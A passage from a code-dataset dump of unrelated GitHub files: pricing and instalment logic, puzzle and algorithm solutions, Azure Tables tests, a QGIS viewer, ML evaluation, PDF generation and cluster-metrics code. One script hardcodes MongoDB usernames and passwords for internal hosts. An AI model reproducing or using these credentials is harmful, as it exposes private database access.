-10000\n return set_discount\n\n \"\"\"Total amount\"\"\"\n def total_price(self, pet_price, other_price, dc_price, hs_price, insurance_price, food_price, home_price, care_price, set_discount) :\n total_price = pet_price + other_price + dc_price + hs_price + insurance_price + food_price + home_price + care_price + set_discount\n return total_price\n\n \"\"\"Instalment principal\"\"\"\n def capital(self, total_price, down_payment):\n capital = total_price - down_payment\n return capital\n\n \"\"\"Build the interest fee list\"\"\"\n def ratefee_list(self,capital ,rate_list):\n ratefee_list = []\n count = len(rate_list)\n for c in range(count):\n rate = rate_list[c]\n ratefee = int(capital * rate / 100)\n ratefee_list.append(ratefee)\n return ratefee_list\n\n \"\"\"Build the list of total instalment amounts\"\"\"\n def totalsplit_list(self, capital, ratefee_list):\n totalsplit_list = []\n for ratefee in ratefee_list:\n totalsplit = capital + ratefee\n totalsplit_list.append(totalsplit)\n return totalsplit_list\n\n \"\"\"Monthly payment list\"\"\"\n def splitmonth_list(self,totalsplit_list, number_list, b_total_list):\n splitmonth_list = []\n for number, ts, bt in zip(number_list, totalsplit_list, b_total_list):\n set_list = []\n ts -= bt\n split2 = int((ts / 100) / number) * 100\n split1 = ts - (split2 * (number - 1))\n if number == 1:\n split2 = ts\n split1 = 0\n set_list.append(split2)\n set_list.append(split1)\n splitmonth_list.append(set_list)\n return splitmonth_list\n\n \"\"\"Payment start date\"\"\"\n def start_date(self, created_at, month, day):\n editdate = date(created_at.year, created_at.month, day)\n start_date = editdate + relativedelta(months=month)\n return start_date\n\n \"\"\"Payment completion date list\"\"\"\n def enddate_list(self, start_date, number_list):\n enddate_list = []\n for n in number_list:\n n -= 1\n enddate = start_date + relativedelta(months=n)\n enddate = enddate.strftime('%Y/%m')\n enddate_list.append(enddate)\n return enddate_list\n\n \"\"\"List of bonus payment counts\"\"\"\n def b_count_list(self, start_date, number_list):\n b_count_list = []\n for n in number_list:\n b_count = 0\n for c in range(n):\n check_date = start_date + relativedelta(months=c)\n if check_date.month == self.bonus_s_month or check_date.month == self.bonus_w_month:\n b_count += 1\n b_count_list.append(b_count)\n return b_count_list\n\n \"\"\"List of total bonus payments\"\"\"\n def b_total_list(self, b_count_list):\n b_total_list = []\n for c in b_count_list:\n if self.bonus_setting == False:\n b_total = 0\n else:\n b_total = c * self.bonus_payment\n b_total_list.append(b_total)\n return b_total_list\n\n \"\"\"Bonus ratio list\"\"\"\n def b_ratio_list(self, b_total_list, capital):\n b_ratio_list = []\n for bt in b_total_list:\n if bt == 0:\n b_ratio = str(0) + '%'\n else:\n b_ratio = str(ceil(bt / capital * 100)) + '%'\n b_ratio_list.append(b_ratio)\n return b_ratio_list\n","repo_name":"guribee/my-app","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32780176497","text":"import os\nfrom collections import defaultdict\n\n# https://adventofcode.com/2021/day/25\n\ndef nextPos(x,y,mx,my,ch):\n if ch == '>':\n return ((x+1) % mx,y)\n elif ch == 'v':\n return (x,(y+1) % my)\n else:\n return (x,y)\n\ndef dump(map,mx,my):\n for y in range(my):\n s = ''\n for x in range(mx):\n s += map[(x,y)]\n print(s)\n print('')\n\ndef run(map, mx, my):\n m = map.copy()\n steps = 0\n while True:\n moved = False\n steps += 1\n ch = '>'\n #dump(m,mx,my)\n m2 = {}\n for y in range(my):\n for x in range(mx):\n 
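# First pass ('>'): every east-facing cucumber moves one step right (with\n # wrap-around) when its target cell is free. Moves within a pass are\n # simultaneous, which is why updates are written into the fresh map m2\n # rather than m.\n 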
if m[(x,y)] == ch:\n np = nextPos(x,y,mx,my,ch)\n if m[np] == '.':\n m2[(x,y)] = '.'\n m2[np] = ch\n moved = True\n else:\n m2[(x,y)] = m[(x,y)]\n elif (x,y) not in m2:\n m2[(x,y)] = m[(x,y)]\n m = m2\n m2 = {}\n ch = 'v'\n for y in range(my):\n for x in range(mx):\n if m[(x,y)] == ch:\n np = nextPos(x,y,mx,my,ch)\n if m[np] == '.':\n m2[(x,y)] = '.'\n m2[np] = ch\n moved = True\n else:\n m2[(x,y)] = m[(x,y)]\n elif (x,y) not in m2:\n m2[(x,y)] = m[(x,y)]\n\n m = m2\n\n if not moved:\n #print('no movement after', steps)\n return steps\n\n # if steps % 100 == 0:\n # print(steps, 'steps')\n\nwith open(os.path.dirname(os.path.realpath(__file__)) + \"/../input/day25-input\", \"r\") as f:\n input = [line.strip() for line in f.readlines()]\n\n# input = [\n# 'v...>>.vv>',\n# '.vv>>.vv..',\n# '>>.>v>...v',\n# '>>v>>.>.v.',\n# 'v>v.vv.v..',\n# '>.>>..v...',\n# '.vv..>.>v.',\n# 'v.v..>>v.v',\n# '....v..v.>',\n# ]\n\nmap = defaultdict()\nxmax = len(input[0])\nymax = len(input)\nfor y,line in enumerate(input):\n for x,ch in enumerate(line):\n map[(x,y)] = ch\n\nprint(\"Day 25\")\nprint(\" Part 1:\", run(map,xmax,ymax))\n#print(\" Part 2:\", 0)\n","repo_name":"shunty-gh/AdventOfCode2021","sub_path":"py/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43174331286","text":"import pytest\n\nfrom devtools_testutils import AzureTestCase\n\nfrom azure.core.credentials import AzureNamedKeyCredential\nfrom azure.core.exceptions import ResourceExistsError\nfrom azure.data.tables import TableServiceClient\n\nfrom _shared.testcase import TableTestCase, SLEEP_DELAY\nfrom preparers import cosmos_decorator\n\n# ------------------------------------------------------------------------------\nTEST_TABLE_PREFIX = 'pytablesync'\n# ------------------------------------------------------------------------------\n\nclass StorageTableTest(AzureTestCase, TableTestCase):\n\n @cosmos_decorator\n def test_create_table(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n\n table_name = self._get_table_reference()\n\n # Act\n table = ts.get_table_client(table_name)\n created = table.create_table()\n\n # Assert\n assert created.name == table_name\n ts.delete_table(table_name)\n\n @cosmos_decorator\n def test_create_table_fail_on_exist(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n table_name = self._get_table_reference()\n\n # Act\n created = ts.create_table(table_name)\n with pytest.raises(ResourceExistsError):\n ts.create_table(table_name)\n\n # Assert\n assert created\n ts.delete_table(table_name)\n\n @cosmos_decorator\n def test_query_tables_per_page(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n\n table_name = \"mytable\"\n\n for i in range(5):\n ts.create_table(table_name + str(i))\n\n query_filter = \"TableName eq 'mytable0' or TableName eq 'mytable1' or TableName eq 'mytable2'\"\n table_count = 0\n page_count = 0\n for table_page in ts.query_tables(query_filter, results_per_page=2).by_page():\n\n 
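# by_page() yields one server page per iteration; with results_per_page=2\n # the three matching tables should come back as a page of 2 followed by a\n # page of 1, which the page and table counters below verify.\n 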
temp_count = 0\n for table in table_page:\n temp_count += 1\n assert temp_count <= 2\n page_count += 1\n table_count += temp_count\n\n assert page_count == 2\n assert table_count == 3\n\n self._delete_all_tables(ts)\n\n @cosmos_decorator\n def test_query_tables(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n table = self._create_table(ts)\n\n # Act\n tables = list(ts.list_tables())\n\n # Assert\n assert tables is not None\n assert len(tables) >= 1\n assert tables[0] is not None\n ts.delete_table(table.table_name)\n\n @cosmos_decorator\n def test_query_tables_with_filter(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n table = self._create_table(ts)\n\n # Act\n name_filter = \"TableName eq '{}'\".format(table.table_name)\n tables = list(ts.query_tables(name_filter))\n\n # Assert\n assert tables is not None\n assert len(tables) == 1\n ts.delete_table(table.table_name)\n\n self._delete_all_tables(ts)\n\n @cosmos_decorator\n def test_query_tables_with_num_results(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n prefix = 'listtable'\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n table_list = []\n for i in range(0, 4):\n self._create_table(ts, prefix + str(i), table_list)\n\n # Act\n small_page = []\n big_page = []\n for s in next(ts.list_tables(results_per_page=3).by_page()):\n small_page.append(s)\n assert s.name.startswith(prefix)\n for t in next(ts.list_tables().by_page()):\n big_page.append(t)\n assert t.name.startswith(prefix)\n\n # Assert\n assert len(small_page) == 3\n assert len(big_page) >= 4\n\n self._delete_all_tables(ts)\n\n @cosmos_decorator\n def test_query_tables_with_marker(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n prefix = 'listtable'\n table_names = []\n for i in range(0, 4):\n self._create_table(ts, prefix + str(i), table_names)\n\n # table_names.sort()\n\n # Act\n generator1 = ts.list_tables(results_per_page=2).by_page()\n next(generator1)\n generator2 = ts.list_tables(results_per_page=2).by_page(\n continuation_token=generator1.continuation_token)\n next(generator2)\n\n tables1 = generator1._current_page\n tables2 = generator2._current_page\n\n # Assert\n assert len(tables1) == 2\n assert len(tables2) == 2\n assert tables1 != tables2\n\n self._delete_all_tables(ts)\n\n @cosmos_decorator\n def test_delete_table_with_existing_table(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n table = self._create_table(ts)\n\n # Act\n deleted = ts.delete_table(table_name=table.table_name)\n\n # Assert\n existing = list(ts.query_tables(\"TableName eq '{}'\".format(table.table_name)))\n assert len(existing) == 0\n\n @cosmos_decorator\n def test_delete_table_with_non_existing_table_fail_not_exist(self, tables_cosmos_account_name,\n tables_primary_cosmos_account_key):\n # Arrange\n ts = 
TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n table_name = self._get_table_reference()\n ts.delete_table(table_name)\n\n\nclass TestTableUnitTest(TableTestCase):\n tables_cosmos_account_name = \"fake_storage_account\"\n tables_primary_cosmos_account_key = \"fakeXMZjnGsZGvd4bVr3Il5SeHA\"\n credential = AzureNamedKeyCredential(name=tables_cosmos_account_name, key=tables_primary_cosmos_account_key)\n\n def test_create_table_invalid_name(self):\n # Arrange\n ts = TableServiceClient(self.account_url(self.tables_cosmos_account_name, \"cosmos\"), credential=self.credential)\n invalid_table_name = \"my_table\"\n\n with pytest.raises(ValueError) as excinfo:\n ts.create_table(table_name=invalid_table_name)\n\n assert \"Table names must be alphanumeric, cannot begin with a number, and must be between 3-63 characters long.\" in str(\n excinfo)\n\n def test_delete_table_invalid_name(self):\n # Arrange\n ts = TableServiceClient(self.account_url(self.tables_cosmos_account_name, \"cosmos\"), credential=self.credential)\n invalid_table_name = \"my_table\"\n\n with pytest.raises(ValueError) as excinfo:\n ts.create_table(invalid_table_name)\n\n assert \"Table names must be alphanumeric, cannot begin with a number, and must be between 3-63 characters long.\" in str(\n excinfo)\n\n def test_unicode_create_table_unicode_name(self):\n # Arrange\n url = self.account_url(self.tables_cosmos_account_name, \"cosmos\")\n ts = TableServiceClient(url, credential=self.credential)\n table_name = u'啊齄丂狛狜'\n\n # Act\n with pytest.raises(ValueError):\n ts.create_table(table_name)","repo_name":"mirespace/python-azure","sub_path":"sdk/tables/azure-data-tables/tests/test_table_cosmos.py","file_name":"test_table_cosmos.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38099597702","text":"def stoneGameVII(stones):\n \"\"\"\n :type stones: List[int]\n :rtype: int\n \"\"\"\n alice, bob = 0, 0\n dp = [[0]*len(stones) for i in range(len(stones))]\n n = len(stones)\n for i in range(n-1):\n dp[i][i+1] = max(stones[i], stones[i+1])\n d = {}\n for i in range(2, n): # window length (gap between the two endpoints)\n for j in range(n-i): # left endpoint of the window\n if d.get((j+1, j+i+1), -1) == -1:\n d[(j+1, j+i+1)] = sum(stones[j+1:j+i+1])\n if d.get((j, j+i), -1) == -1:\n d[(j, j+i)] = sum(stones[j:j+i])\n k1 = d[(j+1, j+i+1)] - dp[j+1][j+i] # remove the first stone\n k2 = d[(j, j+i)] - dp[j][j+i-1] # remove the last stone\n dp[j][j+i] = max(k1, k2)\n return dp[0][n-1]\ns = [1, 3, 5, 7, 9]\nb = [5,3,1,4,2]\na = [7,90,5,1,100,10,10,2]\nprint(stoneGameVII(a))\n\n \n\n\n\n\n\n","repo_name":"wulalala17/leetcode","sub_path":"leetcode/2020/competition/121303.py","file_name":"121303.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"41708875690","text":"from qgis.PyQt.QtGui import (QPixmap, QImage)\nfrom qgis.PyQt.QtWidgets import (QGraphicsScene, QGraphicsView)\nfrom qgis.PyQt.QtCore import (Qt, pyqtSignal, QCoreApplication, QFileInfo, QRectF)\nfrom qgis.core import (QgsRectangle, QgsProject)\nfrom qgis.gui import (QgsMapTool, QgsRubberBand, QgsMapCanvas)\n\nimport os.path\n\n\nclass MouseClick(QgsMapTool):\n afterLeftClick = pyqtSignal()\n afterRightClick = pyqtSignal()\n afterDoubleClick = pyqtSignal()\n\n def __init__(self, canvas, drawSelf):\n QgsMapTool.__init__(self, canvas)\n self.canvas = canvas\n self.drawSelf = drawSelf\n 
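# drawSelf is the owning plugin object; shared state such as the rubber band,\n # the active layer and the clicked feature index is stored on it so that it\n # survives between canvas events.\n 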
self.drawSelf.rb = None\n self.imageViewDLG = None\n\n def canvasPressEvent(self, event):\n if event.button() == 1:\n # sigeal : keep photo viewer on top of other windows\n if self.imageViewDLG is not None:\n self.imageViewDLG.setWindowFlags(Qt.WindowStaysOnTopHint)\n self.drawSelf.refresh()\n\n # sigeal : display photo on click instead of double-click\n #def canvasDoubleClickEvent(self, event):\n def canvasReleaseEvent(self, event):\n layers = self.canvas.layers()\n p = self.toMapCoordinates(event.pos())\n w = self.canvas.mapUnitsPerPixel() * 10\n try:\n rect = QgsRectangle(p.x() - w, p.y() - w, p.x() + w, p.y() + w)\n except:\n return\n layersSelected = []\n for layer in layers:\n if layer.type():\n continue\n fields = [field.name().upper() for field in layer.fields()]\n if 'IMAGE' in fields:\n lRect = self.canvas.mapSettings().mapToLayerCoordinates(layer, rect)\n layer.selectByRect(lRect)\n selected_features = layer.selectedFeatures()\n if selected_features != []:\n layersSelected.append(layer)\n feature = selected_features[0]\n self.drawSelf.featureIndex = feature.id()\n activeLayerChanged = not hasattr(self.drawSelf, 'layerActive') or (self.drawSelf.layerActive != layer)\n self.drawSelf.layerActive = layer\n self.drawSelf.fields = fields\n self.drawSelf.maxlen = len(self.drawSelf.layerActive.name())\n self.drawSelf.layerActiveName = layer.name()\n self.drawSelf.iface.setActiveLayer(layer)\n imgPath = list(self.drawSelf.images.values())[self.drawSelf.featureIndex-1].source\n if imgPath:\n self.drawSelf.getImage = QImage(imgPath)\n if self.imageViewDLG is None or activeLayerChanged:\n self.imageViewDLG = QGraphicsView()\n self.showImage()\n else:\n self.drawSelf.iface.messageBar().pushCritical(\"Error\", \"No file path present\")\n \n # noinspection PyMethodMayBeStatic\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('Image', message)\n\n def showImage(self):\n scene = QGraphicsScene()\n self.imageViewDLG.setScene(scene)\n pixmap = QPixmap.fromImage(self.drawSelf.getImage)\n scene.addPixmap(pixmap)\n self.imageViewDLG.fitInView(scene.itemsBoundingRect(), Qt.KeepAspectRatio)\n self.imageViewDLG.show()\n\n # self.imageViewDLG.viewer.scene.addPixmap(pixmap)\n # self.imageViewDLG.viewer.setSceneRect(QRectF(pixmap.rect()))\n # self.imageViewDLG.viewer.resizeEvent([])\n # self.imageViewDLG.showNormal()","repo_name":"Serkhani/imageviewer","sub_path":"mouse_click.py","file_name":"mouse_click.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26482959213","text":"from __future__ import print_function\nfrom stylelens_object.objects import Objects\nfrom pprint import pprint\n# create an instance of the API class\napi_instance = Objects()\n\ntry:\n api_response = api_instance.get_objects(\"5a50d4ba4dfd7d90b8b9369a\",\n # is_indexed=True,\n sort_key='index',\n sort_order=1,\n is_main=True\n )\n pprint(api_response)\nexcept Exception as e:\n print(\"Exception when calling get_objects: %s\\n\" % 
e)\n","repo_name":"BlueLens/stylelens-object","sub_path":"sample/get_objects.py","file_name":"get_objects.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32301649879","text":"from autoencoder import Autoencoder\nfrom config import Config \nfrom data_source import Data_Source\nimport numpy as np \nimport tensorflow as tf \n\n\nconfig = Config()\nconfig.init()\nmodel = Autoencoder( config )\nif config.data_source == \"mnist\":\n\tfrom data_source import Data_Source\nelif config.data_source == \"ucf\":\n\tfrom data_source_ucf import Data_Source\nelif config.data_source == \"youtube\":\n\tfrom data_source_youtube import Data_Source\n\ndata_source = Data_Source( config )\nif config.train:\n model.train( data_source )\nelse:\n assert config.load_model != \"\"\n model.saver.restore( model.sess, config.load_model )\n\n sample, target = data_source.get_train_batch_ae()\n logit, decode = model.sess.run( [ model.logits, model.decode ], feed_dict = { model.sample_input: sample } )\n\n print( \"=== cross_entropy ===\" )\n\n ce = model.sess.run( tf.reduce_mean( tf.reduce_sum( tf.nn.sigmoid_cross_entropy_with_logits( logits = logit, labels = target ), axis = [2,3,4] ) ))\n print( ce )\n print()\n\n print( \"=== MSE ===\" )\n\n overall = np.mean( np.square( decode - target ) )\n print( \"Overall MSE: \", overall )\n print(\"\")\n\n recon = decode[ :, :config.ae_seq_l, :, :, : ]\n truth = sample[ :, :config.ae_seq_l, :, :, : ]\n recon_mse = np.mean( np.square( recon - truth ) )\n print( \"recon mse: \", recon_mse )\n print( \"\" )\n\n mse_list = []\n for i in range( config.ae_out_seq_l - config.ae_seq_l ):\n \tpred = decode[ :, i + config.ae_seq_l, :, :, : ]\n \ttruth = target[ :, i + config.ae_seq_l, :, :, : ]\n\n \tmse = np.mean( np.square( pred - truth ) )\n \tmse_list.append( mse )\n\n print( \"mse decay\", mse_list )\n print()\n\n print( \"=== SSIM ===\" )\n\n\n\n\n\n\n","repo_name":"YingjingLu/seq2seq-motion","sub_path":"calc_res.py","file_name":"calc_res.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22559212315","text":"from spacy import explain\nfrom fpdf import FPDF\n\n\nclass PDFMaker:\n def __init__(self, ID, font=\"helvetica\", font_size=16):\n self.font = font\n self.fontSize = font_size\n self.ID = ID\n\n def createMeetingNotes(self, paragraphs, entity_dict):\n pdf = FPDF()\n pdf.set_font(self.font, size=self.fontSize)\n\n pdf.add_page()\n pdf.cell(0, 10, txt=\"Meeting Notes\", ln=2, align=\"C\")\n\n for para in paragraphs:\n pdf.multi_cell(0, 10, txt=para, align=\"J\", ln=1)\n\n pdf.add_page()\n pdf.cell(0, 10, txt=\"Entities Found\", ln=2, align=\"C\")\n\n for (entityType, instance) in entity_dict.items():\n pdf.cell(0, 10, txt=explain(entityType), ln=1)\n\n for i in instance:\n pdf.cell(0, 10, txt=i, ln=1)\n\n pdf.output(f\"{self.ID}_MeetingNotes.pdf\")\n\n def createSummary(self, summaries, properNouns, links, n_summary):\n pdf = FPDF()\n pdf.set_font(self.font, size=self.fontSize)\n\n pdf.add_page()\n pdf.cell(0, 10, txt=\"Summary\", ln=2, align=\"C\")\n\n for para in summaries:\n pdf.multi_cell(0, 10, txt=para, align=\"J\", ln=1)\n\n pdf.add_page()\n pdf.cell(0, 10, txt=\"Important Keywords\", ln=2, align=\"C\")\n\n for i in range(len(properNouns)):\n pdf.cell(0, 10, txt=properNouns[i], ln=1, link=links[i])\n pdf.multi_cell(0, 10, txt=n_summary[i], ln=2)\n\n 
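# Each keyword above is rendered as a clickable cell (via link=...) followed\n # by its short summary; the finished document is written out below, named\n # after the meeting ID.\n 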
pdf.output(f\"{self.ID}_Summary.pdf\")\n\n\nif __name__ == \"__main__\":\n paragraphs = [\"para1\", \"para2\", \"para3\", \"para4\"]\n\n ed = {\"ORG\": [\"Apple\", \"Google\"], \"GPE\": [\"U.K.\"], \"MONEY\": [\"$1 billion\"]}\n\n summaries = [\"summary1\", \"summary2\"]\n\n properNouns = [\"Google\", \"U.K.\"]\n\n links = [\n \"https://en.wikipedia.org/wiki/Google\",\n \"https://en.wikipedia.org/wiki/United_Kingdom\",\n ]\n\n n_summaries = [\n \"Google LLC is an American multinational technology company that specializes in Internet-related services and products, which include online advertising technologies, a search engine, cloud computing, software, and hardware. It is considered one of the Big Five technology companies in the U.S. information technology industry, alongside Amazon, Facebook, Apple, and Microsoft. Google was founded in September 1998 by Larry Page and Sergey Brin while they were Ph.D. students at Stanford University in California.\",\n \"The United Kingdom of Great Britain and Northern Ireland, commonly known as the United Kingdom (UK) or Britain, is a sovereign country in north-western Europe, off the north-­western coast of the European mainland. The United Kingdom includes the island of Great Britain, the north-­eastern part of the island of Ireland, and many smaller islands within the British Isles. Northern Ireland shares a land border with the Republic of Ireland.\",\n ]\n\n pdf = PDFMaker(12)\n pdf.createMeetingNotes(paragraphs, ed)\n pdf.createSummary(summaries, properNouns, links, n_summaries)\n","repo_name":"KushGrandhi/Polaroid","sub_path":"ML/PDFMaker.py","file_name":"PDFMaker.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"28863278428","text":"from .module import Module\n\n\nclass Metrics(Module):\n dependencies = ['service']\n metric_choices = [\n 'memory',\n 'cpu'\n ]\n\n def __init__(self, **kwargs):\n super().__init__('metrics', **kwargs)\n\n def add_arguments(self, parser):\n subp = parser.add_subparsers(help='metrics help')\n\n p = subp.add_parser('ls', help='list metrics')\n p.add_argument('--all', '-a', action='store_true', help='include inactive metrics')\n p.set_defaults(metrics_handler=self.handle_list)\n\n p = subp.add_parser('mk', help='add metrics')\n p.add_argument('task', metavar='TASK', help='task name')\n p.add_argument('metric', metavar='METRIC', choices=self.metric_choices, help='metric')\n p.set_defaults(metrics_handler=self.handle_make)\n\n p = subp.add_parser('rm')\n p.add_argument('name', metavar='NAME', help='metric to remove')\n p.set_defaults(metrics_handler=self.handle_remove)\n\n p = subp.add_parser('clear')\n p.set_defaults(metrics_handler=self.handle_clear)\n\n def handle_list(self, args):\n self.list(args.all)\n\n def list(self, all):\n ctx = self.get_context()\n metrics = self.gets3(f'{ctx[\"cluster\"]}/metrics.json') or {}\n for task, mets in metrics.items():\n print(f'{task} ({\",\".join( sorted( mets ) )})')\n\n def handle_make(self, args):\n self.make(args.task, args.metric)\n\n def make(self, task_name, met_name):\n ctx = self.get_context()\n metrics = self.gets3(f'{ctx[\"cluster\"]}/metrics.json') or {}\n met_list = metrics.setdefault(task_name, [])\n if met_name in met_list:\n return\n met_list.append(met_name)\n self.puts3(f'{ctx[\"cluster\"]}/metrics.json', metrics)\n met = f'docker-{ctx[\"app\"]}-{task_name}.*-{met_name}.percent-'\n node_mod = self.client.get_module('node')\n cmd = f'echo {met} >> 
/usr/share/collectd/collectd-cloudwatch/src/cloudwatch/config/whitelist.conf'\n cmd += '; systemctl restart collectd'\n cmd = '\\'' + cmd + '\\''\n node_mod.all_run(cmd)\n\n def handle_remove(self, args):\n mach_mod = self.client.get_module('machine')\n cmd = f'echo {args.name} >> /usr/share/collectd/collectd-cloudwatch/src/cloudwatch/config/whitelist.conf'\n mach_mod.ssh_run(cmd, discard=False)\n\n def handle_clear(self, args):\n self.clear()\n\n def clear(self):\n ctx = self.get_context()\n self.puts3(f'{ctx[\"cluster\"]}/metrics.json', {})\n cmd = f'truncate -s 0 /usr/share/collectd/collectd-cloudwatch/src/cloudwatch/config/whitelist.conf'\n cmd += '; systemctl restart collectd'\n cmd = '\\'' + cmd + '\\''\n node_mod = self.client.get_module('node')\n node_mod.all_run(cmd)\n","repo_name":"uptick/python-fuku","sub_path":"fuku/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"27402863978","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/26 10:14 AM\n# @Author : Sulong\n# @File : content_targeting.py\n# @Software: PyCharm\n\n'''\nJuliet Health:\n Compare the contentTargeting collection against CMS articles (which are physically deleted).\n For articles found to be deleted, set articleExist to false in the contentTargeting\n collection; articles that still exist are left untouched.\n'''\nfrom pymongo import MongoClient\nimport requests\nimport socket\n\ndef link_mongo(name):\n\tif name == 'test':\n\t\tclient = MongoClient('10.162.201.58', 3717)\n\t\tdb = client.zlydata # client['zlydata']\n\t\tdb.authenticate(\"opadmin\", \"opadmin_2016\")\n\t\tcollection = db.contentTargeting\n\t\treturn collection\n\tif name == 'official':\n\t\tclient = MongoClient('10.162.201.58', 3728)\n\t\tdb = client.zlydata # client['zlydata']\n\t\tdb.authenticate(\"opadmin\", \"MLN8v22BXG9YOCq7\")\n\t\tcollection = db.contentTargeting\n\t\treturn collection\n\n# Fetch the contentTargeting article-id list\ndef get_content_list():\n\tcontentTargeting = []\n\tdb = link_mongo('test')\n\tfor i in db.find({'isDeleted': False, 'articleExist': True}):\n\t\t# print(i['_id'])\n\t\tcontentTargeting.append(i['articleId'])\n\treturn contentTargeting\n\n# Fetch the cms list based on the contentTargeting list\ndef get_cms_list(list,name):\n\tcms_list=[]\n\tif name =='test':\n\t\tcms_list = requests.get(url='http://articles_exists()', params={list}) # GET request with parameters\n\t\treturn cms_list\n\tif name =='official':\n\t\tcms_list = requests.get(url='http://articles_exists()', params={list}) # GET request with parameters\n\t\treturn cms_list\n\nif __name__ == '__main__':\n\tlink_mongo('test')\n\t# print(l)\n\t# s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\t# host = '10.174.89.71'\n\t# port = 8181\n\t# conn = s.connect((host,port))\n\t# print('connected to server %s' % host)\n\t# # msg = s.recv(1024)\n\t# conn.use_service(['add'])\n\t# err, res = conn.add(1, 2)\n\t# print('result: %s' % str(res))\n\t# conn.disconnect()\n\t# print('disconnected from server %s' % host)\n\t# s.close()","repo_name":"Sulongsl/python","sub_path":"script/content_targeting.py","file_name":"content_targeting.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18271156","text":"import socket\nimport threading\nfrom enum import Enum\n\nfrom libx import user1 as bob\nfrom user_functions import *\n\n\n# bob.InitOT(1) # for client\n\nclass ApplicationType(Enum):\n SERVER = 0\n CLIENT = 1\n\n\ndef send_x(connection):\n while True:\n x = input(\"x: \")\n y = input(\"y: \")\n xy 
= x + '$' + y\n print(xy)\n connection.send(bytes(xy, 'utf-8'))\n\n\napplicationType = ApplicationType.CLIENT\n\npeer = '127.0.0.1'\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n# Try to start as a client. If that fails, start as a server and wait for a client\ntry:\n sock.connect((peer, 10000))\nexcept ConnectionRefusedError:\n sock.bind(('0.0.0.0', 10000)) # binding to local network card, port 10000\n sock.listen(1)\n applicationType = ApplicationType.SERVER\n\n# Set up user\nbob.InitOT(applicationType.value)\n\n# Different implementations for Client and Server\nif applicationType == ApplicationType.SERVER:\n securityParam = generate_security_params(bob)\n conn, addr = sock.accept()\n sock = conn\n pass\nelse:\n pass\n\nvaluesReceived = {'blindedK': False, 'otherP': False, 'otherQ': False, 'blindedR': False, 'otherA': False,\n 'otherE': False}\n\n# Generate Blinded Key\nbobBKey = bob.GetBlinedKey()\n\n# pass -> to Alice and get from Alice\n\n# get salary\nbobSalary = 503554646651\nbob.SetCompareValue(bobSalary)\n\nprint(\"Bob: Connected to Alice\")\n\npayload = \"first payload\"\n\n# Protocol\nwith sock:\n iThread = threading.Thread(target=send_x, args=(sock,))\n iThread.daemon = True\n iThread.start()\n\n while True:\n if payload != 0:\n data = sock.recv(1024)\n payload = extractData(str(data, 'utf-8'))\n print(payload)\n else:\n print(\"NOT WORKING\")\n","repo_name":"dulajdilshan/salary_check","sub_path":"chckpnt_client1_app.py","file_name":"chckpnt_client1_app.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8417462682","text":"\"\"\"\nGiven a list containing positive and negative numbers,\nreplace every element of the list with the value of the\nopposite sign. For example, given the list [1, -5, 0, 3, -4], the
